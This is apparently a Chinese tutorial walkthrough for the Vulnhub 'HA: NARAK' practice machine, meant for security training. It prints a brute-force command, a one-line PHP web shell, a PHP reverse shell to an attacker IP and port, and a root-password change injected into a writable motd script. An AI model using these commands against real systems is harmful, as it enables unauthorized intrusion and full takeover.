Vulnhub HA: NARAK 靶机渗透
字数 1014 2025-08-15 21:33:52
HA: NARAK 靶机渗透教学文档
靶机基础信息
- 下载链接: https://www.vulnhub.com/entry/ha-narak,569/
- 发布日期: 2020年9月23日
- 难度等级: 容易/中等
- 目标: 获取两个flag文件(user.txt和root.txt)
- 运行环境: VMware Workstation Pro (桥接模式)
渗透测试流程
一、信息收集阶段
-
发现靶机IP
nmap 192.168.1.0/24- 发现靶机IP为192.168.1.104
-
端口扫描与服务识别
nmap -sV -p- -O -A 192.168.1.104- 开放端口:
- 22/tcp: OpenSSH 7.6p1 (Ubuntu)
- 80/tcp: Apache httpd 2.4.29 (Ubuntu)
- 开放端口:
-
网站信息收集
- 访问http://192.168.1.104/
- 检查网页源码未发现可利用信息
二、漏洞探测
-
目录扫描
- 发现/webdav目录: http://192.168.1.104/webdav
-
WebDAV认证爆破
- 使用cewl生成字典:
cewl 192.168.1.104 -w pass.txt - 使用hydra爆破:
hydra -L pass.txt -P pass.txt 192.168.1.104 http-get /webdav - 获取凭证:
- 用户名: yamdoot
- 密码: Swarg
- 使用cewl生成字典:
三、漏洞利用
-
WebDAV文件上传
- 使用cadaver工具上传PHP木马:
cadaver http://192.168.1.104/webdav/ put 1.php - 木马内容(1.php):
<?php system($_GET['cmd']); ?>
- 使用cadaver工具上传PHP木马:
-
反弹Shell
- 通过木马执行命令:
php -r '$sock=fsockopen("192.168.1.107",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);' - 升级交互式shell:
python3 -c "import pty;pty.spawn('/bin/bash')"
- 通过木马执行命令:
-
获取user.txt
- 路径: /home/inferno/user.txt
-
密码破解
- 在/mnt目录发现hell.sh
- 包含Brainfuck加密字符串
- 使用在线工具解密: https://www.splitbrain.org/services/ook
- 获取明文密码: chitragupt
- 尝试SSH登录:
- 成功登录inferno用户(用户名:inferno, 密码:chitragupt)
四、权限提升
-
信息收集
- 下载并运行linpeas.sh:
git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git python3 -m http.server 8001 chmod 777 linpeas.sh ./linpeas.sh
- 下载并运行linpeas.sh:
-
发现可写文件
- 发现/etc/update-motd.d/00-header可写
- 该文件是SSH登录时的欢迎界面脚本
-
修改root密码
echo "echo 'root:admin' | sudo chpasswd" >> 00-header- 重新登录SSH后执行命令修改root密码
-
获取root.txt
- 路径: /root/root.txt
总结
该靶机渗透过程涉及以下关键技能:
- WebDAV服务识别与利用
- 密码爆破与字典生成
- 文件上传漏洞利用
- Brainfuck加密破解
- 通过可写文件进行权限提升
适合初学者练习基础渗透测试技能,特别是Web应用漏洞利用和Linux权限提升技术。